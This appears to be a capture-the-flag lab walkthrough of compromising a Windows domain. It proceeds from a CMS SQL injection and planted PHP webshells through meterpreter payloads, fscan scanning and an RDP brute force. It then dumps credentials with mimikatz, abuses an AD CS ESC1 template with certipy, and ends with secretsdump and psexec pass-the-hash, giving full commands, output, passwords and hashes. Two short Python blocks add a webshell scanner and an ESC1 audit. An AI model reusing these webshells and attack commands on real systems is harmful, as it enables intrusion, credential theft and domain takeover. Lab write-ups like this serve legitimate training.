cyberstrikelab-lab9
Host 1
web 172.5.33.6

SQL payload
http://172.5.33.6/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5

The hash a66abb5684c45962d887564f08346e8d decrypts to admin123456.
The admin path is found in robots.txt; log in with the administrator account.

Here we notice that the HTML templates contain PHP code.

Edit index.html in template management:
<?php @eval($_POST['a']);?>

The one-liner shell still won't connect, so try a different shell; there seems to be no other way in. Of the dozen or so shell variants found online, only this one works:
```php
<?php
function simpleTransform($str, $offset = 1) {
    $transformed = '';
    for ($i = 0; $i < strlen($str); $i++) {
        $transformed .= chr((ord($str[$i]) + $offset) % 256);
    }
    return $transformed;
}
$original = $_REQUEST["a"];
$transformed = simpleTransform($original, 3);
function reverseTransform($str, $offset = 1) {
    $reversed = '';
    for ($i = 0; $i < strlen($str); $i++) {
        $reversed .= chr((ord($str[$i]) - $offset + 256) % 256);
    }
    return $reversed;
}
$reversed = reverseTransform($transformed, 3);
echo eval($reversed);
```
Connect with AntSword.
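Because the template engine executes PHP, a defender's check for this CMS is to scan the template directory for code-execution sinks that consume request input. The scanner below is an added example written for this page, not the CMS's or any tool's own code; its sink and source lists are constructed, and the sample templates are built from the two shells above. The byte-shift in the second shell only transforms the payload in transit, so eval and $_REQUEST remain in clear text in the file and a plain scan catches both.

```python
import re

# Constructed lists for this example: PHP code-execution sinks and
# request-controlled sources. Extend them for the CMS being protected.
SINKS = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|popen|"
                   r"proc_open|create_function)\s*\(", re.I)
SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|FILES)\b|php://input|"
                     r"\bgetallheaders\s*\(", re.I)
PHP_OPEN = re.compile(r"<\?(?:php\b|=)", re.I)

def scan_template(text):
    """Report PHP blocks, sinks and request sources found in one template file."""
    report = {"php_blocks": len(PHP_OPEN.findall(text)), "sinks": [], "sources": []}
    for no, line in enumerate(text.splitlines(), 1):
        report["sinks"] += [(no, m.group(1).lower()) for m in SINKS.finditer(line)]
        report["sources"] += [(no, m.group(0)) for m in SOURCES.finditer(line)]
    return report

def verdict(report):
    """'webshell' when request input and a code-execution sink share a template,
    'review' for a sink without an obvious source, 'clean' otherwise."""
    if report["sinks"] and report["sources"]:
        return "webshell"
    return "review" if report["sinks"] else "clean"

# Constructed samples: a legitimate template, the one-liner from this page, and
# a shortened form of the byte-shift shell. Shifting the payload does not hide
# eval and $_REQUEST, which still appear in clear text in the file itself.
CLEAN = "<html><body><?php echo htmlspecialchars($title); ?></body></html>"
ONE_LINER = "<html><?php @eval($_POST['a']);?></html>"
TRANSFORM = ('<?php\n$original = $_REQUEST["a"];\n'
             "$transformed = simpleTransform($original, 3);\n"
             "$reversed = reverseTransform($transformed, 3);\n"
             "echo eval($reversed);\n")

if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("one-liner", ONE_LINER), ("transform", TRANSFORM)):
        print(name, verdict(scan_template(text)), scan_template(text))
```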

Generate the payload:
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe
Catch the session:
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/bind_tcp; set RHOST 172.5.33.6; set LPORT 4444; exploit -j -z"
Escalate privileges and upload fscan:
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe
Check the IP addresses and scan the internal network:
C:\phpstudy_pro\WWW>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter 以太网实例 1:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::3f:d815:5529:b836%11
IPv4 Address. . . . . . . . . . . : 172.5.33.6
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.5.33.233
Ethernet adapter 以太网实例 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::c133:dd94:56a9:bdcc%2
IPv4 Address. . . . . . . . . . . : 10.6.6.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.6.6.1
Tunnel adapter isatap.{730545FA-7DC0-4716-8AF2-678FFC6D1F1C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter isatap.{E6E2FD25-6949-4C86-A749-7F0F14616295}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.10/24
fscan.exe -h 10.6.6.10/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.1
start infoscan
(icmp) Target 10.6.6.10 is alive
(icmp) Target 10.6.6.55 is alive
(icmp) Target 10.6.6.88 is alive
[*] Icmp alive hosts len is: 3
10.6.6.55:88 open
10.6.6.10:3306 open
10.6.6.88:445 open
10.6.6.55:445 open
10.6.6.10:445 open
10.6.6.88:139 open
10.6.6.55:139 open
10.6.6.10:139 open
10.6.6.88:135 open
10.6.6.55:135 open
10.6.6.10:135 open
10.6.6.55:80 open
10.6.6.10:80 open
[*] alive ports len is: 13
start vulscan
[+] NetInfo:
[*]10.6.6.10
[->]WIN-784BAKDI0AC
[->]172.5.33.6
[->]10.6.6.10
[+] NetInfo:
[*]10.6.6.55
[->]DC
[->]10.6.6.55
[+] NetInfo:
[*]10.6.6.88
[->]cyberweb
[->]10.6.6.88
[*] WebTitle:http://10.6.6.10 code:200 len:0 title:None
[*] 10.6.6.55 [+]DC __MSBROWSE__\DC Windows Server 2016 Standard 14393
[*] 10.6.6.88 CYBERSTRIKELAB\CYBERWEB Windows Server 2016 Standard 14393
[*] 10.6.6.88 (Windows Server 2016 Standard 14393)
[*] 10.6.6.55 (Windows Server 2016 Standard 14393)
[*] WebTitle:http://10.6.6.55 code:200 len:703 title:IIS Windows Server
[+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect
已完成 13/13
[*] 扫描结束,耗时: 1m8.3819491s
10.6.6.55 is identified as the domain controller.
10.6.6.88 is a domain member with hostname cyberweb in the CYBERSTRIKELAB domain.
10.6.6.55: one finding reported, poc-yaml-active-directory-certsrv-detect. This strongly suggests that Active Directory Certificate Services (AD CS) is running on that server, which becomes the key entry point for the rest of the attack.
Add the route and set up the proxy:
meterpreter > run post/multi/manage/autoroute
[*] Running module against WIN-784BAKDI0AC (172.5.33.6)
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.6.6.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 172.5.33.0/255.255.255.0 from host's routing table.
meterpreter > bg
[*] Backgrounding session 2...
msf exploit(multi/handler) > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf auxiliary(server/socks_proxy) > set SRVPORT 1080
SRVPORT => 1080
msf auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
Configure the system proxy file proxychains4.conf:
┌──(root㉿kali)-[/data/windows_atk/domain_atk]
└─# tail -n \6 /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
Host 2
Targeted fscan port scan: 3389 can be brute-forced, and the administrator password is qwe123!@#.
C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.88 -p 1-10000
fscan.exe -h 10.6.6.88 -p 1-10000
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.1
start infoscan
(icmp) Target 10.6.6.88 is alive
[*] Icmp alive hosts len is: 1
10.6.6.88:445 open
10.6.6.88:139 open
10.6.6.88:135 open
10.6.6.88:3389 open
10.6.6.88:5985 open
[*] alive ports len is: 5
start vulscan
[+] NetInfo:
[*]10.6.6.88
[->]cyberweb
[->]10.6.6.88
[*] 10.6.6.88 (Windows Server 2016 Standard 14393)
[*] WebTitle:http://10.6.6.88:5985 code:404 len:315 title:Not Found
[*] 10.6.6.88 CYBERSTRIKELAB\CYBERWEB Windows Server 2016 Standard 14393
已完成 3/5 [-] (18/210) rdp 10.6.6.88:3389 administrator administrator1 remote error: tls: access denied
已完成 4/5 [-] (36/210) rdp 10.6.6.88:3389 administrator 123456789 remote error: tls: access denied
已完成 4/5 [-] (54/210) rdp 10.6.6.88:3389 administrator Aa12345 remote error: tls: access denied
[+] RDP:10.6.6.88:3389:administrator qwe123!@#
已完成 5/5
[*] 扫描结束,耗时: 4m8.7461024s

The second flag is on the desktop.
Host 3
It looks like a domain-controller-related vulnerability is needed; EternalBlue fails.
use exploit/multi/handler
set rhost 10.6.6.88
run
Share the data directory (to make file transfer easier), then upload the bind-shell payload and run it:
proxychains rdesktop 10.6.6.88 -r disk:shell=/data

Escalate privileges:
meterpreter > getuid
Server username: CYBERWEB\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Dump the domain hashes:
C:\Users\Administrator\Desktop>mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
User Name : CYBERWEB$
Domain : CYBERSTRIKELAB
NTLM : 5e0d5d7bacf2087dfd44ea47812b5165
User Name : CYBERWEB$
Domain : CYBERSTRIKELAB
NTLM : 331dcbb88d1a4847c97eab7c1c168ac8
User Name : Administrator
Domain : CYBERWEB
NTLM : c377ba8a4dd52401bc404dbe49771bbc
A set of credentials is found in the file 3.bat: cslab / cs1ab@wwe.

Host 3: AD CS
AD CS is a common path for lateral movement to the domain controller.
3.1 Reconnaissance of the AD CS service
From the earlier fscan output:
[+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect indicates that AD Certificate Services may be present.
Get a session again and run getsystem to obtain a SYSTEM-level cmd, then get the CA name (this requires escalating to SYSTEM) by running certutil.

The name is cyberstrikelab-DC-CA.
With the CA name in hand, we need to determine the attack entry point and look for exploitable misconfigurations such as ESC1.
┌──(root㉿kali)-[/data/demo]
└─# proxychains certipy-ad find -u 'cslab@10.6.6.55' -password 'cs1ab@wwe' -dc-ip 10.6.6.55 -vulnerable -stdout
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:636 ... OK
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'cyberstrikelab-DC-CA' via RRP
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:445 <--socket error or timeout!
[-] Failed to connect to remote registry: [Errno Connection error (224.0.0.1:445)] [Errno 111] Connection refused
[-] Use -debug to print a stacktrace
[!] Failed to get CA configuration for 'cyberstrikelab-DC-CA' via RRP: 'NoneType' object has no attribute 'request'
[!] Use -debug to print a stacktrace
[!] Could not retrieve configuration for 'cyberstrikelab-DC-CA'
[*] Checking web enrollment for CA 'cyberstrikelab-DC-CA' @ 'DC.cyberstrikelab.com'
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:443 ... OK
[*] Enumeration output:
Certificate Authorities
0
CA Name : cyberstrikelab-DC-CA
DNS Name : DC.cyberstrikelab.com
Certificate Subject : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com
Certificate Serial Number : 652A47597C7F03824B7815EBE474E40B
Certificate Validity Start : 2025-04-22 07:45:38+00:00
Certificate Validity End : 2030-04-22 07:55:38+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Active Policy : Unknown
Disabled Extensions : Unknown
Certificate Templates
0
Template Name : DC
Display Name : DC
Certificate Authorities : cyberstrikelab-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2025-04-22T07:58:11+00:00
Template Last Modified : 2025-04-22T07:58:11+00:00
Permissions
Enrollment Permissions
Enrollment Rights : CYBERSTRIKELAB.COM\Domain Users
CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Domain Computers
CYBERSTRIKELAB.COM\Enterprise Admins
CYBERSTRIKELAB.COM\Authenticated Users
Object Control Permissions
Owner : CYBERSTRIKELAB.COM\Administrator
Full Control Principals : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
Write Owner Principals : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
Write Dacl Principals : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
Write Property Enroll : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Domain Computers
CYBERSTRIKELAB.COM\Enterprise Admins
[+] User Enrollable Principals : CYBERSTRIKELAB.COM\Authenticated Users
CYBERSTRIKELAB.COM\Domain Computers
CYBERSTRIKELAB.COM\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
| Parameter | Source/Reason | Purpose |
|---|---|---|
| proxychains | Proxy configuration set up earlier | Routes the command's traffic through the pivot host (10.6.6.10) into the internal network |
| certipy-ad | Tool choice | Tool dedicated to AD Certificate Services attacks |
| find | Subcommand | Enumerates certificate templates and certificate authorities (CAs) |
| -u 'cslab@10.6.6.55' | Obtained from mimikatz | Uses the domain user cslab; the part after @ can be an IP or a domain name |
| -password 'cs1ab@wwe' | Obtained from mimikatz/3.bat | Password of the cslab user |
| -dc-ip 10.6.6.55 | fscan scan result | Specifies the domain controller's IP address |
| -vulnerable | Attack target | Shows only certificate templates with known vulnerabilities |
| -stdout | Output option | Prints the results to the terminal |
The results show that ESC1 is present:
Template Name: DC
Enabled: True
Client Authentication: True
Enrollee Supplies Subject: True # key ESC1 condition
Enrollment Rights: CYBERSTRIKELAB.COM\Domain Users # cslab can enrol
Vulnerabilities: ESC1
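The five conditions Certipy combines into an ESC1 finding can be checked directly from the template attributes shown above, and the same check tells a defender which single setting to change. The audit below is an added example, not Certipy's own code; the LOW_PRIV and CLIENT_AUTH_EKUS sets are constructed for this example, while DC_TEMPLATE is filled in from the certipy output on this page.

```python
from dataclasses import dataclass
# Constructed for this example: principals treated as low-privileged, and
# EKUs that let a certificate be used for Kerberos client authentication.
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}
CLIENT_AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
                    "Smart Card Logon", "Any Purpose"}

@dataclass(frozen=True)
class Template:
    name: str
    enabled: bool
    enrollee_supplies_subject: bool
    ekus: frozenset = frozenset()          # empty means "any purpose"
    requires_manager_approval: bool = False
    authorized_signatures_required: int = 0
    enrollment_rights: frozenset = frozenset()

def low_priv_enrollers(t):
    """Enrollment principals that every domain user or computer already is."""
    return {p for p in t.enrollment_rights if p.split("\\")[-1] in LOW_PRIV}

def esc1_conditions(t):
    """Names of the ESC1 conditions that t meets; all five together mean ESC1."""
    checks = [
        ("template enabled", t.enabled),
        ("low-privileged principals can enroll", bool(low_priv_enrollers(t))),
        ("enrollee supplies subject", t.enrollee_supplies_subject),
        ("EKU allows client authentication",
         not t.ekus or bool(t.ekus & CLIENT_AUTH_EKUS)),
        ("no manager approval or signatures required",
         not t.requires_manager_approval and t.authorized_signatures_required == 0),
    ]
    return [name for name, met in checks if met]

def is_esc1(t):
    return len(esc1_conditions(t)) == 5

def remediations(t):
    """Single-setting changes, any one of which breaks the ESC1 chain for t."""
    if not is_esc1(t):
        return []
    fixes = ["clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT so the CA builds the subject from AD",
             "set CT_FLAG_PEND_ALL_REQUESTS so a CA manager must approve each request"]
    fixes += [f"remove the Enroll right from {p}" for p in sorted(low_priv_enrollers(t))]
    return fixes

# The 'DC' template exactly as certipy reported it on this page.
DC_TEMPLATE = Template(
    name="DC", enabled=True, enrollee_supplies_subject=True,
    ekus=frozenset({"Client Authentication"}),
    enrollment_rights=frozenset("CYBERSTRIKELAB.COM\\" + g for g in (
        "Domain Users", "Domain Admins", "Domain Computers",
        "Enterprise Admins", "Authenticated Users")),
)
```

Running `is_esc1(DC_TEMPLATE)` returns True and `remediations(DC_TEMPLATE)` lists the two flag changes plus the three low-privileged Enroll rights to remove.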
3.2 Exploiting ESC1
3.2.1 Create a (temporary) machine account
Use the domain user cslab to create a new machine account in the target domain; the output returns the temporary account tmpuser$ and its password.
proxychains certipy-ad -debug account create -u 'cslab@cyberstrikelab.com' -p 'cs1ab@wwe' -dc-ip 10.6.6.55 -user tmpuser -dns DC.cyberstrikelab.com

| Parameter | Source/Reason | Purpose |
|---|---|---|
| account create | Subcommand | Creates a new machine account in the domain |
| -user tmpuser | Custom | Creates a machine account named tmpuser$ |
| -dns DC.cyberstrikelab.com | Obtained from the fscan results | Sets the machine account's DNS hostname |
Why create one?
- Machine template restriction: some certificate templates (such as Machine) only allow machine accounts to enrol.
- Stealth: avoids performing sensitive operations directly with the cslab account.
- Permission requirements: machine accounts can request a wider range of certificate types.
3.2.2 Request a certificate as the machine account
Use the newly created machine account tmpuser$ to request a machine certificate from the certificate authority (CA) on the target domain controller (10.6.6.55). (Run it several times; a single run may not succeed.)
proxychains certipy-ad req \
-u 'tmpuser$@cyberstrikelab.com' \
-p 'kQb8YIJOWcKq69w5' \
-ca 'cyberstrikelab-DC-CA' \
-target 10.6.6.55 \
-template 'Machine' \
-dc-ip 10.6.6.55

| Parameter | Source/Reason | Purpose |
|---|---|---|
| req | Subcommand | Requests a certificate |
| -u 'tmpuser$@...' | Created in the previous step | Uses the newly created machine account |
| -p 'kQb8YIJOWcKq69w5' | Output of the previous step | Password of the machine account |
| -ca 'cyberstrikelab-DC-CA' | certipy find result | Name of the certificate authority |
| -target 10.6.6.55 | fscan scan result | IP address of the CA server |
| -template 'Machine' | Reconnaissance finding | Uses the vulnerable template |
Authenticating to the domain controller (10.6.6.55) with the dc.pfx certificate fails with a Kerberos clock-skew error: the attacker machine and the DC must not differ by more than 5 minutes.
┌──(root㉿kali)-[/data/demo]
└─# proxychains certipy-ad auth -pfx dc.pfx -dc-ip 10.6.6.55
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC.cyberstrikelab.com'
[*] Using principal: 'dc$@cyberstrikelab.com'
[*] Trying to get TGT...
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
3.2.3 Fix the Kerberos clock skew
Query the DC's time:
proxychains net time -S 10.6.6.55

3.2.4 Authenticate with the certificate
Adjust the time and the command succeeds:
┌──(root㉿kali)-[/data/demo]
└─# faketime '2025-12-11 22:57:01' proxychains certipy-ad -debug auth -pfx dc.pfx -dc-ip 10.6.6.55
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '10.6.6.55'
[+] DC IP: '10.6.6.55'
[+] DC Host: ''
[+] Target IP: '10.6.6.55'
[+] Remote Name: '10.6.6.55'
[+] Domain: ''
[+] Username: ''
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC.cyberstrikelab.com'
[*] Using principal: 'dc$@cyberstrikelab.com'
[*] Trying to get TGT...
[+] Sending AS-REQ to KDC cyberstrikelab.com (10.6.6.55)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK
[*] Got TGT
[*] Saving credential cache to 'dc.ccache'
[+] Attempting to write data to 'dc.ccache'
[+] Data written to 'dc.ccache'
[*] Wrote credential cache to 'dc.ccache'
[*] Trying to retrieve NT hash for 'dc$'
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK
[*] Got hash for 'dc$@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa
| Parameter | Source/Reason | Purpose |
|---|---|---|
| auth | Subcommand | Kerberos authentication with the certificate |
| -pfx dc.pfx | Generated in the previous step | Certificate file containing the private key |
| -debug | Debug option | Shows detailed progress information |
Authentication flow:
- Certificate submission: present the dc.pfx certificate to the DC (10.6.6.55)
- Identity verification: the certificate asserts that the requester is DC$ (the domain controller's machine account)
- TGT acquisition: a Kerberos ticket-granting ticket (TGT) for DC$ is obtained
- Hash extraction: the NTLM hash of DC$ is extracted from the TGT
3.2.5 Obtain the NTLM hashes
Use the NT hash of the DC's machine account dc$ for pass-the-hash authentication and attempt to extract all domain users' credential material (NTLM hashes and so on) from the DC.
┌──(root㉿kali)-[/data/demo]
└─# proxychains impacket-secretsdump cyberstrikelab.com/dc\$@10.6.6.55 -hashes aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:445 ... OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:49669 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:416f4ea64c9c73ad29a4a69dcee5d8ca:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cyberstrikelab.com\cslab:1104:aad3b435b51404eeaad3b435b51404ee:39b0e84f13872f51efb3b8ba5018c517:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:7e5d2858c617c4ccf32b28241dc5b8b2:::
tmpuser$:1105:aad3b435b51404eeaad3b435b51404ee:6fe8e4da8776622663eed7aba05de2f7:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8583c13a9eca67e085ff0b68af74316bef0ebd3fb197bb235b76cbb72358f2ef
Administrator:aes128-cts-hmac-sha1-96:6012285d474e3b60086965219ac7e31c
Administrator:des-cbc-md5:208fc8f42fae3132
krbtgt:aes256-cts-hmac-sha1-96:0b820697b640266ced6843c4041131c1e3750000e00d47c0c597a82547927337
krbtgt:aes128-cts-hmac-sha1-96:c8f683e4cf2033fd75416667670e13bb
krbtgt:des-cbc-md5:23dc674a76bf7adc
cyberstrikelab.com\cslab:aes256-cts-hmac-sha1-96:34439b0bf9f6e1bf57d4d859215ed387a9c75e944ac053ddd1bc2f1e5b162048
cyberstrikelab.com\cslab:aes128-cts-hmac-sha1-96:84a132b5db39e2e652c08b8148fecb00
cyberstrikelab.com\cslab:des-cbc-md5:46f457ef2aad0e08
DC$:aes256-cts-hmac-sha1-96:2292c30804bdf9a61d170f48d38b30d3f843bb8310677ac7116e925f663edcbd
DC$:aes128-cts-hmac-sha1-96:b583afdc96a04ec0ceda8dffdfa2e883
DC$:des-cbc-md5:a75801e31943a2dc
CYBERWEB$:aes256-cts-hmac-sha1-96:c0418d75b0ef82607eadcd0f4793441aa17fc71df788e83a531ae87ce2cc92d9
CYBERWEB$:aes128-cts-hmac-sha1-96:3c602f53a3722c0a602a5adf2114354a
CYBERWEB$:des-cbc-md5:6d5dd3261f38c862
tmpuser$:aes256-cts-hmac-sha1-96:952c1a920206e3a5852ea56dfdde77acb8270bf12628c29a7f702a9cdc8fb081
tmpuser$:aes128-cts-hmac-sha1-96:1174b1ae9d7f4b04fd5eef81bcbd2144
tmpuser$:des-cbc-md5:795d80ec58cdd5a8
[*] Cleaning up...
| Parameter | Source/Reason | Purpose |
|---|---|---|
| impacket-secretsdump | Tool choice | Tool for remotely extracting password hashes |
| cyberstrikelab.com/dc\$@10.6.6.55 | Target specification | Connects to the DC as the dc$ account |
| -hashes ... | Obtained in the previous step | Supplies the LM and NTLM hashes of dc$ |
| the \ in dc\$ | Shell escaping | Prevents the shell from expanding $ as a variable |
3.2.6 PTH
Pass-the-hash to take the DC and grab the final flag from the root directory:
┌──(root㉿kali)-[/data/demo]
└─# proxychains impacket-psexec -hashes :28cfbc91020438f2a064a63fff9871fa cyberstrikelab.com/administrator@10.6.6.55
